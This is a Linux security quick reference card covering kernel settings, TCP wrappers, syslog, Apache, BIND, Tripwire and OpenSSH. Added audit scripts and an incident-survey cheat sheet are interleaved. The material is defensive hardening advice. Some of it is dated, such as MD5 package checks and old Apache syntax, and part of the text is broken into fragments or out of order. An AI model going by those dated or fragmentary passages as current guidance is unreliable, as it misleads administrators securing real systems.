• OpenSSH secure remote access tool: http://www.openssh.com
• OpenWall Security Project: http://www.openwall.com
• Network Time Protocol information: http://www.ntp.org
• nmap Port Scanner: http://www.insecure.org/nmap
• Practical UNIX & Internet Security, Second Ed. O’Reilly & Assoc, ISBN 1565921488
• rsync Incremental File Transfer Utility: http://rsync.samba.org
• Secure Shell FAQ: http://www.employees.org/~satch/ssh/faq/
• Security-related HOWTOs and FAQs: http://www.linuxsecurity.com/docs
• Site Security Handbook (RFC2196): http://www.linuxsecurity.com/docs/rfcs/rfc2196.txt
• sudo root access control tool: http://www.courtesan.com/sudo
• Snort Network Intrusion Detection System: http://www.snort.org
• Tripwire file integrity tool: http://www.tripwiresecurity.com
• Using Snort: http://www.linuxsecurity.com/using-snort.html

Linux Security Quick Reference Guide

Introduction:

The intent of this Quick Reference Guide is to provide a starting point for improving the security of your system, to serve as a pointer to more in-depth security information, and to increase security awareness and methods that can be used to improve security. It is not a substitute for reading any of the vast amounts of Linux security documentation that already exists.

In the ever-changing world of global data communications, inexpensive Internet connections, and fast-paced software development, security is becoming more and more of an issue. Security is now a basic requirement because global computing is inherently insecure. As your data goes from point A to point B on the Internet, it may pass through several other points along the way, giving other users the opportunity to intercept, and even alter, your data. Even other users on your system may maliciously transform your data into something you did not intend. Unauthorized access to your system may be obtained by intruders, also known as “crackers”, who then use advanced knowledge to impersonate you, steal information from you, or even deny you access to your own resources.

Security involves defense in depth. Approaching security a step at a time, with consistency and vigilance, you can mitigate the security threats, and keep the crackers at bay.

Keep your system up to date by making sure you have installed the current versions of software and are aware of all security alerts. Doing this alone will help make your system markedly more secure.

The more secure your system is the more intrusive your security becomes. You need to decide where in this balancing act your system will still be usable yet secure for your purposes.

If you have more than one person logging on to your machine, or machines, you should establish a “Security Policy” stating how much security is required by your site and what auditing is in place to monitor it.

Security Glossary:

• Buffer Overflow: A condition that occurs when a user or process attempts to place more data into a program’s storage buffer in memory and then overwrites the actual program data with instructions that typically provide a shell owned by root on the server. Accounted for more than 50 percent of all major security bugs leading to security advisories published by CERT. Typically associated with set-user-ID root binaries.

• Cryptography: The mathematical science that deals with transforming data to render its meaning unintelligible, prevent its undetected alteration, or prevent its unauthorized use.

• Denial of Service: Occurs when a resource is targeted by an intruder to prevent legitimate users from using that resource. They are a threat to the availability of data to all others trying to use that resource. Range from unplugging the network connection to consuming all the available network bandwidth.

• IP Spoofing: An attack in which one host masquerades as another. This can be used to route data destined for one host to another, thereby allowing attackers to intercept data not originally intended for them. It is typically a one-way attack.

• Port Scanning: The process of determining which ports are active on a machine. By probing as many hosts as possible, means to exploit the ones that respond can be developed. It is typically the precursor to an attack.

• Packet Filtering: A method of filtering network traffic as it passes between the firewall’s interfaces at the network level. The network data is then analyzed according to the information available in the data packet, and access is granted or denied based on the firewall security policy. Usually requires an intimate knowledge of how network protocols work.

• Proxy Gateway: Also called Application Gateways, act on behalf of another program. A host with a proxy server installed becomes both a server and a client, and acts as a choke between the final destination and the client. Proxy servers are typically small, carefully-written single-purpose programs that only permit specific services to pass through it. Typically combined with packet filters.

• Set User-ID (setuid) / Set Group-ID (setgid): Files that everyone can execute with either its owner’s or its group’s privileges. Typically, you'll find root-owned setuid files, which means that regardless of who executes them, they obtain root permission for the period of time the program is running (or until that program intentionally relinquishes these privileges). These are the types of files that are most often attacked by intruders, because of the potential for obtaining root privileges. Commonly associated with buffer overflows.

• Trojan Horse: A program that masquerades itself as a benign program, when in fact it is not. A program can be modified by a malicious programmer that purports to do something useful, but in fact contains a malicious program containing hidden functions, exploiting the privileges of the user executing it. A modified version of /bin/ps, for example, may be used to hide the presence of other programs running on the system.

• Vulnerability: A condition that has the potential for allowing security to be compromised. Many different types of network and local vulnerabilities exist and are widely known, and frequently occur on computers regardless of their level of network connectivity, processing speed, or profile.

Kernel Security:

Several kernel configuration options are available to improve security through the /proc pseudo-filesystem. Quite a few of the files in /proc/sys are directly related to security. An option is enabled if its file contains a 1 and disabled if it contains a 0. Many of the options available in /proc/sys/net/ipv4 include:

• icmp_echo_ignore_all: Ignore all ICMP ECHO requests. Enabling this option will prevent this host from responding to ping requests.

• icmp_echo_ignore_broadcasts: Ignore ICMP echo requests with a broadcast/multicast destination address. Your network may be used as an exploder for denial of service packet flooding attacks to other hosts.

• ip_forward: Enable or disable the forwarding of IP packets between interfaces. Default value is dependent on whether the kernel is configured as host or router.

• ip_masq_debug: Enable or disable debugging of IP masquerading.

• tcp_syncookies: Protection from the “SYN Attack”. Send syn cookies when the SYN backlog queue of a socket overflows.

• rp_filter: Determines if source address verification is enabled. Enable this option on all routers to prevent IP spoofing attacks against the internal network.

• secure_redirects: Accept ICMP redirect messages only for gateways listed in default gateway list.

• log_martians: Log packets with impossible addresses to kernel log.

• accept_source_route: Determines whether source routed packets are accepted or declined. Should be disabled unless specific reason requires it.

The file /etc/sysctl.conf on recent Red Hat contains a few default settings and is processed at system startup. The /sbin/sysctl program can be used to control these parameters. It is also possible to configure their values using /bin/echo. For example, to disable IP forwarding, as root run:

echo "0" > /proc/sys/net/ipv4/ip_forward

This must be written to a system startup file or /etc/sysctl.conf on Red Hat to occur after each reboot. More information is available in the proc.txt file in the kernel Documentation/ directory.
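A check of the net/ipv4 settings listed above against the values the card recommends, written as an added example for this page (not the card's own code). The root directory is a parameter so the check can run against a constructed copy of /proc/sys here and against / on a real host. The expected values (ip_forward=0 for the host case) and the fake tree are this example's own; it also assumes, as on current kernels, that rp_filter, accept_source_route, log_martians and secure_redirects are per-interface files under conf/all/ and conf/<iface>/ rather than sitting directly in net/ipv4.

```shell
#!/bin/sh
# Added example for this page, not the reference card's own code.
# Compares the net/ipv4 settings the card discusses against hardened values
# and can emit the equivalent /etc/sysctl.conf lines.

# key=value pairs relative to <root>/proc/sys/net/ipv4. ip_forward=0 assumes a
# host rather than a router. The per-interface keys are checked under conf/all
# (assumption: current kernels keep them there, not at the top level).
IPV4_EXPECTED='
ip_forward=0
icmp_echo_ignore_broadcasts=1
tcp_syncookies=1
conf/all/rp_filter=1
conf/all/accept_source_route=0
conf/all/log_martians=1
conf/all/secure_redirects=1
'

# Print one line per deviation ("<key> actual=<v> expected=<e>" or
# "<key> missing"); return 0 only when every key matches. With no argument
# the live /proc/sys is read.
check_ipv4_sysctls() {
    root=${1:-}
    bad=0
    for pair in $IPV4_EXPECTED; do
        key=${pair%%=*}; want=${pair#*=}
        f="$root/proc/sys/net/ipv4/$key"
        if [ ! -r "$f" ]; then
            echo "$key missing"; bad=1; continue
        fi
        have=$(tr -d '[:space:]' < "$f")
        if [ "$have" != "$want" ]; then
            echo "$key actual=$have expected=$want"; bad=1
        fi
    done
    return $bad
}

# The same expectations as sysctl.conf lines (net.ipv4.conf.all.rp_filter = 1),
# the persistent form the card says a startup file or /etc/sysctl.conf needs.
sysctl_conf_lines() {
    for pair in $IPV4_EXPECTED; do
        key=$(printf '%s' "${pair%%=*}" | tr / .)
        echo "net.ipv4.$key = ${pair#*=}"
    done
}

# Constructed fake tree: a host with forwarding left on and syncookies off.
make_fake_procsys() {
    d=$(mktemp -d)
    mkdir -p "$d/proc/sys/net/ipv4/conf/all"
    echo 1 > "$d/proc/sys/net/ipv4/ip_forward"
    echo 1 > "$d/proc/sys/net/ipv4/icmp_echo_ignore_broadcasts"
    echo 0 > "$d/proc/sys/net/ipv4/tcp_syncookies"
    echo 1 > "$d/proc/sys/net/ipv4/conf/all/rp_filter"
    echo 0 > "$d/proc/sys/net/ipv4/conf/all/accept_source_route"
    echo 1 > "$d/proc/sys/net/ipv4/conf/all/log_martians"
    echo 1 > "$d/proc/sys/net/ipv4/conf/all/secure_redirects"
    echo "$d"
}
```

`check_ipv4_sysctls` with no argument audits the running kernel and exits non-zero on any deviation, which makes it usable from cron; `sysctl_conf_lines` prints the lines to review and then append to /etc/sysctl.conf so the settings survive a reboot, the point the card makes about the echo command being lost otherwise.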

http://www.LinuxSecurity.com info@LinuxSecurity.com

Network Intrusion Detection:

Intrusion detection devices are an integral part of any network. The Internet is constantly evolving, and new vulnerabilities and exploits are found regularly. They provide an additional level of protection to detect the presence of an intruder, and help to provide accountability for the attacker's actions.

The snort network intrusion detection tool performs real-time traffic analysis, watching for anomalous events that may be considered a potential intrusion attempt. Based on the contents of the network traffic, at either the IP or application level, an alert is generated. It is easily configured, utilizes familiar methods for rule development, and takes only a few minutes to install. Snort currently includes the ability to detect more than 1100 potential vulnerabilities. It is quite feature-packed out of the box:

• Detect and alert based on pattern matching for threats including buffer overflows, stealth port scans, CGI attacks, SMB probes and NetBIOS queries, NMAP and other portscanners, well-known backdoors and system vulnerabilities, DDoS clients, and many more;

• Can be used on an existing workstation to monitor a home DSL connection, or on a dedicated server to monitor a corporate web site.

© 2

000 G

uard

ian

Dig

ital, I

nc.

htt

p:/

/ww

w.G

ua

rdia

nD

igit

al.

co

m

Imp

lem

en

tati

on

By

Da

ve

Wre

sk

iC

on

cep

t B

y B

en

jam

in T

ho

mas

Pe

rmis

sio

n t

o d

istr

ibu

te g

ran

ted

Intr

od

uc

tio

n:

Co

ntr

ollin

g F

ile P

erm

issio

ns &

Att

rib

ute

s:

Secu

rity

Glo

ssary

:

Kern

el

Secu

rity

:

Gen

era

l S

ecu

rity

Tip

s:

Ne

two

rk I

ntr

us

ion

De

tec

tio

n:

Lin

ux S

ecu

rity

Reso

urc

es:

v1.1


File/Directory        Perms  Description
/var/log              751    Directory containing all log files
/var/log/messages     644    System messages
/etc/crontab          600    System-wide crontab file
/etc/syslog.conf      640    Syslog daemon configuration file
/etc/logrotate.conf   640    Controls rotating of system log files
/var/log/wtmp         660    Who is logged in now. Use who to view
/var/log/lastlog      640    Who has logged in before. Use last to view
/etc/ftpusers         600    List of users that cannot FTP
/etc/passwd           644    List of the system's user accounts
/etc/shadow           600    Contains encrypted account passwords
/etc/pam.d            750    PAM configuration files
/etc/hosts.allow      600    Access control file
/etc/hosts.deny       600    Access control file
/etc/lilo.conf        600    Boot loader configuration file
/etc/securetty        600    TTY interfaces that allow root logins
/etc/shutdown.allow   400    Users permitted to ctrl-alt-del
/etc/security         700    System access security policy files
/etc/rc.d/init.d      750    Program start-up files on Red Hat systems
/etc/init.d           750    Program start-up files on Debian systems
/etc/sysconfig        751    System and network config files on Red Hat
/etc/inetd.conf       600    Internet SuperServer configuration file
/etc/cron.allow       400    List of users permitted to use cron
/etc/cron.deny        400    List of users denied access to cron
/etc/ssh              750    Secure Shell configuration files
/etc/sysctl.conf      400    Contains kernel tunable options on recent Red Hat
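The table above can be turned into an audit. The following is an added example, not part of the original quick reference: it compares the mode of each listed file against the recommended value and flags only the bits the recommendation does not grant (a stricter mode passes). It runs against a constructed temporary tree so it can be tried anywhere; point audit() at "/" to check a live host.

```python
"""Audit critical files against the recommended modes in the table above.

Added example, not part of the original quick reference. Only bits the
recommendation does not grant are flagged, so a stricter mode passes.
"""
import os
import stat
import tempfile

# path -> recommended mode, copied from the table above (subset shown)
RECOMMENDED = {
    "/etc/passwd": 0o644,
    "/etc/shadow": 0o600,
    "/etc/hosts.allow": 0o600,
    "/etc/hosts.deny": 0o600,
    "/etc/syslog.conf": 0o640,
    "/etc/sysctl.conf": 0o400,
    "/var/log": 0o751,
}


def excess_bits(actual, recommended):
    """Permission bits set in `actual` that `recommended` does not allow."""
    return (actual & 0o7777) & ~recommended


def audit(root, table=RECOMMENDED):
    """Check every table entry below `root` (use "/" for the live system).

    Returns (violations, missing): violations maps path -> (actual, excess)
    for files that are more permissive than recommended; missing lists
    entries that do not exist (not every listed file exists everywhere).
    """
    violations = {}
    missing = []
    for path, want in table.items():
        full = os.path.join(root, path.lstrip("/"))
        try:
            st = os.lstat(full)          # lstat: do not follow a planted symlink
        except FileNotFoundError:
            missing.append(path)
            continue
        actual = stat.S_IMODE(st.st_mode)
        extra = excess_bits(actual, want)
        if extra:
            violations[path] = (actual, extra)
    return violations, missing


def format_report(violations):
    """One line per violation, octal modes written as chmod would take them."""
    return [
        f"{path}: mode {actual:04o}, extra bits {extra:04o}"
        for path, (actual, extra) in sorted(violations.items())
    ]


def build_sample_tree():
    """Constructed stand-in for a real root: shadow and hosts.deny are
    deliberately world-readable, the other files follow the table."""
    root = tempfile.mkdtemp(prefix="permaudit-")
    etc = os.path.join(root, "etc")
    log = os.path.join(root, "var", "log")
    os.makedirs(etc)
    os.makedirs(log)
    os.chmod(log, 0o751)
    sample_modes = {
        "passwd": 0o644,
        "shadow": 0o644,       # should be 0600
        "hosts.allow": 0o600,
        "hosts.deny": 0o644,   # should be 0600
        "syslog.conf": 0o640,
    }
    for name, mode in sample_modes.items():
        target = os.path.join(etc, name)
        with open(target, "w") as fh:
            fh.write("# constructed sample file\n")
        os.chmod(target, mode)
    return root


if __name__ == "__main__":
    sample_root = build_sample_tree()
    found, absent = audit(sample_root)
    for line in format_report(found):
        print(line)
    print("not present:", ", ".join(absent))
```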

Frequently used to monitor and control access to services listed in /etc/inetd.conf. The in.ftpd service might be wrapped using:

ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -L -i -o

Before the in.telnetd daemon is spawned, tcpd first determines if the source is a permitted host. Connection attempts are sent to syslogd. All services should be disabled by default in /etc/hosts.deny using the following:

ALL: ALL

To send an email to the admin and report failed connection attempt:

ALL: ALL: /bin/mail \
    -s "%s connection attempt from %c" [email protected]

Enable specific services in /etc/hosts.allow using the service name followed by the host:

sshd: magneto.mydom.com, juggernaut.mydom.com
in.ftpd: 192.168.1.

Trailing period indicates entire network should be permitted. Use tcpdchk to verify your access files. A syslog entry will be created for failed attempts.

Access control is performed in the following order:

The /bin/rpm program on Red Hat and derivatives and the /usr/bin/dpkg on Debian and derivatives are used to control the management of packages.

• Remove a package
# rpm -e <package-name>
# dpkg -r <package-name>

• List contents of entire installed package
# rpm -qvl <package-name>
# dpkg -c <package-name.deb>

• List all installed packages with info about each
# rpm -qvia
# dpkg -l

• List contents of a package
# rpm -qvpl <package-name.rpm>
# dpkg -c <package-name.deb>

• Print information about a package
# rpm -qpi <package-name.rpm>
# dpkg -I <package-name.deb>

• Verify package characteristics (basic integrity check)
# rpm -Va
# debsums -a

• Determine to which package a file belongs
# rpm -qf </path/to/file>
# dpkg -S </path/to/file>

• Install new package
# rpm -Uvh <package-name.rpm>
# dpkg -i <package-name.deb>

The syslogd is responsible for capturing logging information generated by system processes. The klogd is responsible for capturing logging information generated by the kernel. System logs provide the primary indication of a potential problem.

• Fine-tune the default /etc/syslog.conf to send log information to specific files for easier analysis.

# Monitor authentication attempts
auth.*;authpriv.*                       /var/log/authlog
# Monitor all kernel messages
kern.*                                  /var/log/kernlog
# Monitor all warning and error messages
*.warn;*.err                            /var/log/syslog
# Send a copy to remote loghost. Configure syslogd init
# script to run with -r -s domain.com options on log
# server. Ensure a high level of security on the log
# server!
*.info                                  @loghost
auth.*;authpriv.*                       @loghost

• Restrict access to log directory and syslog files for normal users using:

# chmod 751 /var/log /etc/logrotate.d
# chmod 640 /etc/syslog.conf /etc/logrotate.conf
# chmod 640 /var/log/*log
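To see which destinations a given message reaches under the fragment above, here is an added example (not from the original guide) implementing the classic sysklogd selector rules: a priority selects that level and everything above it, ";" joins clauses sharing one action, and the last clause naming a facility decides its threshold, which is why "*.warn;*.err" only catches err and above.

```python
"""Resolve where a syslog message goes under the /etc/syslog.conf fragment above.

Added example, not part of the original guide. Implements the classic
sysklogd selector rules: `facility.priority` selects that priority and all
higher ones, `*` is any facility or any priority, `none` drops a facility,
`;` joins clauses sharing one action, and the last clause naming a facility
decides its threshold for that rule.
"""

PRIORITIES = ["debug", "info", "notice", "warning", "err", "crit", "alert", "emerg"]
ALIASES = {"warn": "warning", "error": "err", "panic": "emerg"}

# Constructed from the fragment above; '@host' forwards to a remote loghost.
SYSLOG_CONF = """\
auth.*;authpriv.*    /var/log/authlog
kern.*               /var/log/kernlog
*.warn;*.err         /var/log/syslog
*.info               @loghost
auth.*;authpriv.*    @loghost
"""


def level(name):
    """Numeric rank of a priority name (aliases such as warn accepted)."""
    return PRIORITIES.index(ALIASES.get(name, name))


def parse_conf(text):
    """Return [(clauses, action)] where clauses = [(facility_list, priority)]."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        selector, action = line.split(None, 1)   # whitespace separates the two columns
        clauses = []
        for part in selector.split(";"):
            facilities, priority = part.rsplit(".", 1)
            clauses.append((facilities.split(","), priority))
        rules.append((clauses, action))
    return rules


def selector_matches(clauses, facility, priority):
    """Apply clauses in order; the last one naming `facility` sets its threshold."""
    threshold = None                 # None: this rule says nothing about the facility
    for facilities, prio in clauses:
        if "*" in facilities or facility in facilities:
            threshold = prio
    if threshold is None or threshold == "none":
        return False
    if threshold == "*":
        return True
    return level(priority) >= level(threshold)


def route(conf_text, facility, priority):
    """Actions that receive facility.priority. Rules are independent, so the
    same destination can appear more than once (the message is sent each time)."""
    return [action for clauses, action in parse_conf(conf_text)
            if selector_matches(clauses, facility, priority)]


if __name__ == "__main__":
    for fac, pri in (("auth", "info"), ("kern", "debug"), ("mail", "warning"), ("mail", "err")):
        print(f"{fac}.{pri:<8} -> {route(SYSLOG_CONF, fac, pri)}")
```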

The md5sum command is used to compute a 128-bit fingerprint that is strongly dependent upon the contents of the file to which it is applied. It can be used to compare against a previously-generated sum to determine whether the file has changed. It is commonly used to ensure the integrity of updated packages distributed by a vendor:

# md5sum package-name
995d4f40cda13eacd2beaf35c1c4d5c2 package-name

The string of numbers can then be compared against the MD5 checksum published by the packager. While it does not take into account the possibility that the same person that may have modified a package also may have modified the published checksum, it is especially useful for establishing a great deal of assurance in the integrity of a package before installing it.

• Limit Apache to listen only on local interface by configuring /etc/httpd/conf/httpd.conf to read:

Listen 127.0.0.1:80

• Use the following to disable access to the entire file system by default, unless explicitly permitted. This will disable printing of indexes if no index.html exists, server-side includes, and following symbolic links. Disabling symlinks may impact performance for large sites.

<Directory />
    Options None
    AllowOverride None
    Order deny,allow
    Deny from all
</Directory>

• Use the following to control access to the server from limited addresses in /etc/httpd/conf/access.conf to read:

<Directory /home/httpd/html>
    # Deny all accesses by default
    Order deny,allow
    # Allow access to local machine
    Allow from 127.0.0.1
    # Allow access to entire local network
    Allow from 192.168.1.
    # Allow access to single remote host
    Allow from 192.168.5.3
    # Deny from everyone else
    Deny from all
</Directory>

• Use the following to require password authentication when attempting to access a specific directory in /etc/httpd/conf/access.conf:

<Directory /home/httpd/html/protected>
    Order Deny,Allow
    Deny from All
    Allow from 192.168.1.11
    AuthName "Private Information"
    AuthType Basic
    AuthUserFile /etc/httpd/conf/private-users
    AuthGroupFile /etc/httpd/conf/private-groups
    require group <group-name>
</Directory>

Create the private-groups file using the following format:

group-name: user1 user2 user...

Create password entries for each user in the above list:

# htpasswd -cm /etc/httpd/conf/private-users user1
New password: <password>
Re-type new password: <password>
Adding password for user user1

Be sure to restart apache and test it. This will result in the enabling of double reverse lookups to verify the identity of the remote host. Remove the -c option to htpasswd after the first user has been added. Be sure the password file you create is not located within the DocumentRoot to prevent it from being downloaded.

• Zone transfers should only be permitted by master name servers to update the zone (domain) information in their slave servers. Failure to do so may result in IP numbers and hostnames being revealed to unauthorized users. Restrict queries to only public domains. Suitable for name servers with both public and private zones.

// Allow transfer only to our slave name server. Allow queries
// only by hosts in the 192.168.1.0 network.
zone "mydomain.com" {
    type master;
    file "master/db.mydomain.com";
    allow-transfer { 192.168.1.6; };
    allow-query { 192.168.1.0/24; };
};

• Deny and log queries for our version number except from the local host. The ability to determine the bind version enables an attacker to find the corresponding exploit for that version.

// Disable the ability to determine the version of BIND running
zone "bind" chaos {
    type master;
    file "master/bind";
    allow-query { localhost; };
};

The ./master/bind file should then contain:

$TTL 1d
@   CHAOS SOA localhost. root.localhost. (
        1       ; serial
        3H      ; refresh
        15M     ; retry
        1W      ; expire
        1D )    ; minimum
    NS localhost.

• Control which interfaces named listens on. Restricting the interfaces on which named runs can limit the exposure to only the necessary networks.

listen-on { 192.168.1.1; };

• Use Access Control Lists to classify groups of hosts with differing degrees of trust. The "internal" ACL label might be used to describe internal hosts that are permitted a greater degree of access to the information than other hosts might be. Before it can be used it must be defined:

acl "internal" {
    { 192.168.1.0/24; 192.168.2.11; };
};

It can then be used in "zone" statements or the main "options" statement:

zone "inside.mynet.com" {
    type master;
    file "master/inside.mynet.com";
    allow-query { "internal"; };
};

• Configure BIND to run as a normal user. Once BIND has been started, it has the ability to relinquish its privileges, and run as a user with limited abilities instead of root.

# useradd -M -r -d /var/named -s /bin/false named
# groupadd -r named

This account should be used for nothing other than running the name server. Ensure the zone files are readable by the named user. It is then necessary to modify the default named init script, typically found in /etc/rc.d/init.d/named on Red Hat or /etc/init.d/named on Debian:

/usr/sbin/named -u named -g named

It is also possible to run named in a "chroot jail" which helps to restrict the damage that can be done should named be subverted.

Tripwire is a program that monitors file integrity by maintaining a database of cryptographic signatures for programs and configuration files installed on the system, and reports changes in any of these files. A database of checksums and other characteristics for the files listed in the configuration file is created. Each subsequent run compares any differences to the reference database, and the administrator is notified. The greatest level of assurance that can be provided occurs if Tripwire is run immediately after Linux has been installed and security updates applied, and before it is connected to a network. A text configuration file, called a policy file, is used to define the characteristics for each file that are tracked. Your level of paranoia determines the frequency in which the integrity of the files are checked. Administration requires constant attention to the system changes, and can be time-consuming if used for many systems. Available in unsupported commercial binary for Red Hat and similar.

# Create policy file from text file
/usr/TSS/bin/twadmin -m P policy.txt
# Initialize database according to policy file
/usr/TSS/bin/tripwire --init
# Print database
/usr/TSS/bin/twprint -m d
# Generate daily report file
/usr/TSS/bin/tripwire -m c -t 1 -M
# Update database according to policy file and report file
/usr/TSS/bin/tripwire --update --polfile policy/tw.pol \
    --twrfile report/<hostname>-<date>.twr


OpenSSH is a replacement for telnet and ftp that eliminates eavesdropping, connection hijacking, and encrypts all communication between hosts. One of the most indispensable free security tools in existence.

• Install the OpenSSH and OpenSSL Packages:

openssh-<current-version>.rpm
openssh-server-<current-version>.rpm
openssh-clients-<current-version>.rpm
openssl-<current-version>.rpm

• Generate Public/Private Key Pair:

OpenSSH uses public key cryptography to provide secure authorization. Generating the public key, which is shared with remote systems, and the private key, which is kept on the local system, is done first to configure OpenSSH.

orion$ ssh-keygen
Generating RSA keys: ...ooooooO....ooooooO
Key generation complete.
Enter file in which to save the key (/home/dave/.ssh/identity):
Created directory '/home/dave/.ssh'.
Enter passphrase (empty for no passphrase): <passphrase>
Enter same passphrase again: <passphrase>
Your identification has been saved in /home/dave/.ssh/identity.
Your public key has been saved in /home/dave/.ssh/identity.pub.
The key fingerprint is:
ac:42:11:c8:0d:b6:7e:b4:06:6a:a3:a7:e8:2c:b0:12 dave@orion

• Copy Public Key to Remote Host:

host2$ mkdir -m 700 ~dave/.ssh
host2$ cp /mnt/floppy/identity.pub ~dave/.ssh/authorized_keys

• Login to Remote Host:

The SSH client (/usr/bin/ssh) is a drop-in replacement for rlogin and rsh. It can be used to securely login to a remote host:

orion$ ssh host2
Enter passphrase for RSA key 'dave@orion': <passphrase>
Last login: Sat Aug 15 17:13:01 2000 from orion
No mail.
host2$

• Copy Files to Remote Host:

The OpenSSH package also includes scp, a secure and improved replacement for rcp. This allows you to securely copy files over a network.

orion$ scp /tmp/file.tar.gz host2:/tmp
Enter passphrase for RSA key 'dave@orion':
file.tar.gz 100% |***************************| 98304 00:00

It is also possible to encapsulate ordinarily insecure protocols such as IMAP and POP within SSH to prevent transmitting clear text passwords to your mail server. Additionally, the rsync incremental file transfer utility can use SSH to securely synchronize two hosts or backup data to a log server securely. SSH can even be used to securely connect two subnets across the Internet, effectively creating a virtual private network. Disable remote root logins and empty password ability.

1. Access will be granted when a daemon/client pair matches an entry in the /etc/hosts.allow file.
2. Otherwise, access will be denied when a daemon/client pair matches an entry in the /etc/hosts.deny file.
3. Otherwise, access will be granted.

A non-existing access control file is treated as if it were an empty file. Thus, access control will be turned off if no access control files are present!
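The three-step order above, as an added example that is not code from the original guide: it evaluates a daemon/client pair against constructed hosts.allow and hosts.deny contents, treats a missing file (None) as empty, and honours the trailing-period network notation; a shell command after a second colon is parsed and ignored, never run.

```python
"""Emulate the tcpd access-control order listed above.

Added example, not code from the original guide. The hosts.allow and
hosts.deny contents are constructed; None stands for a file that does not
exist, which tcpd treats as empty. Patterns handled: ALL, exact daemon or
host names, dotted IPv4 prefixes ending in '.' (whole network) and domain
suffixes starting with '.' (real hosts_access syntax, not shown on this
page). Any shell command after a second colon is parsed and ignored.
"""

HOSTS_ALLOW = """\
# constructed: the two rules from the guide
sshd: magneto.mydom.com, juggernaut.mydom.com
in.ftpd: 192.168.1.
"""

HOSTS_DENY = """\
# constructed: deny everything else; the mail recipient is a placeholder
ALL: ALL: /bin/mail -s "%s connection attempt from %c" root@localhost
"""


def parse_rules(text):
    """Return [(daemon_patterns, client_patterns)]; comments and blanks skipped."""
    rules = []
    for raw in (text or "").splitlines():      # None (missing file) behaves as empty
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = [f.strip() for f in line.split(":", 2)]   # 3rd field = shell command
        if len(fields) < 2:
            continue
        daemons = fields[0].replace(",", " ").split()
        clients = fields[1].replace(",", " ").split()
        rules.append((daemons, clients))
    return rules


def pattern_matches(pattern, value):
    """hosts_access matching for the pattern forms used on this page."""
    if pattern == "ALL":
        return True
    if pattern.endswith("."):            # '192.168.1.' = every host in that network
        return value.startswith(pattern)
    if pattern.startswith("."):          # '.mydom.com' = every host in that domain
        return value.lower().endswith(pattern.lower())
    return pattern.lower() == value.lower()


def any_rule_matches(rules, daemon, client):
    """True if some rule matches both the daemon and the client."""
    return any(
        any(pattern_matches(d, daemon) for d in daemons)
        and any(pattern_matches(c, client) for c in clients)
        for daemons, clients in rules
    )


def tcpd_decision(daemon, client, allow_text, deny_text):
    """Return (verdict, reason) in the order above: allow file, deny file, then grant."""
    if any_rule_matches(parse_rules(allow_text), daemon, client):
        return "allow", "matched /etc/hosts.allow"
    if any_rule_matches(parse_rules(deny_text), daemon, client):
        return "deny", "matched /etc/hosts.deny"
    return "allow", "no match in either file (access control is effectively off)"


if __name__ == "__main__":
    checks = [
        ("sshd", "magneto.mydom.com"),
        ("in.ftpd", "192.168.1.44"),
        ("in.ftpd", "192.168.10.44"),
        ("in.telnetd", "magneto.mydom.com"),
    ]
    for daemon, client in checks:
        print(daemon, client, tcpd_decision(daemon, client, HOSTS_ALLOW, HOSTS_DENY))
    # With neither file present, everything is granted:
    print("no files:", tcpd_decision("in.telnetd", "10.0.0.5", None, None))
```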

Disable Unnecessary Services:
Apache Security:
Configuring TCP Wrappers:
Configuring Syslog:
Install and Configure Tripwire:
DNS Security:
Using RPM and dpkg:
Install and Configure OpenSSH:
Checking Package Integrity:
Critical System Files:

Disabling or removing unused programs and services from your host is the most effective way to limit threats originating from a remote host. Use your distribution's package management tools to scan the list of installed packages, then remove those that are unnecessary.

• Many of the services running from inetd are legacy programs, which are hardly ever required, yet typically enabled by default. The file /etc/inetd.conf is used to specify which services are offered. Disable all services that you do not want to provide by commenting them out using the # character in the first column of the line.

• The /etc/rc*.d or /etc/rc.d/rc* directories contain shell scripts that control the execution of network and system services during runlevels. Rename or otherwise disable any that are not required or remove the package entirely. Red Hat users can use /sbin/chkconfig --list to list which services run in which runlevel, and /sbin/chkconfig --del <name> to disable a service. If you don't understand what a particular service does, disable it until you find out. Use netstat and ps to confirm they have not been started after a reboot. Use /bin/netstat -a -p --inet to determine which are available and the process ID associated with them. A port scanner should also be used to get a view of what remote hosts see.


SECURITY INCIDENT SURVEY CHEAT SHEET FOR SERVER ADMINISTRATORS

Tips for examining a suspect system to decide whether to escalate for formal incident response.

Assessing the Suspicious Situation

• To retain attacker's footprints, avoid taking actions that access many files or installing tools.
• Look at system, security, and application logs for unusual events.
• Look at network configuration details and connections; note anomalous settings, sessions or ports.
• Look at the list of users for accounts that do not belong or should have been disabled.
• Look at a listing of running processes or scheduled jobs for those that do not belong there.
• Look for unusual programs configured to run automatically at system's start time.
• Check ARP and DNS settings; look at contents of the hosts file for entries that do not belong there.
• Look for unusual files and verify integrity of OS and application files.
• Use a network sniffer, if present on the system or available externally, to observe for unusual activity.
• A rootkit might conceal the compromise from tools; trust your instincts if the system just doesn't feel right.
• Examine recently-reported problems, intrusion detection and related alerts for the system.

If You Believe a Compromise is Likely...

• Involve an incident response specialist for next steps, and notify your manager.
• Do not panic or let others rush you; concentrate to avoid making careless mistakes.
• If stopping an on-going attack, unplug the system from the network; do not reboot or power down.
• Take thorough notes to track what you observed, when, and under what circumstances.

Windows Initial System Examination

Look at event logs: eventvwr
Examine network configuration: arp -a, netstat -nr
List network connections and related details: netstat -nao, netstat -vb, net session, net use
List users and groups: lusrmgr, net users, net localgroup administrators, net group administrators
Look at scheduled jobs: schtasks
Look at auto-start programs: msconfig
List processes: taskmgr, wmic process list full
List services: net start, tasklist /svc
Check DNS settings and the hosts file: ipconfig /all, ipconfig /displaydns, more %SystemRoot%\System32\Drivers\etc\hosts
Verify integrity of OS files (affects lots of files!): sigverif
Research recently-modified files (affects lots of files!): dir /a/o-d/p %SystemRoot%\System32
Avoid using Windows Explorer, as it modifies useful file system details; use command-line.

Unix Initial System Examination

Look at event log files in directories (locations vary): /var/log, /var/adm, /var/spool
List recent security events: wtmp, who, last, lastlog
Examine network configuration: arp -an, route print
List network connections and related details: netstat -nap (Linux), netstat -na (Solaris), lsof -
List users: more /etc/passwd
Look at scheduled jobs: more /etc/crontab, ls /etc/cron.*, ls /var/at/jobs
Check DNS settings and the hosts file: more /etc/resolv.conf, more /etc/hosts
Verify integrity of installed packages (affects lots of files!): rpm -Va (Linux), pkgchk (Solaris)
Look at auto-start services: chkconfig --list (Linux), ls /etc/rc*.d (Solaris), smf (Solaris 10+)
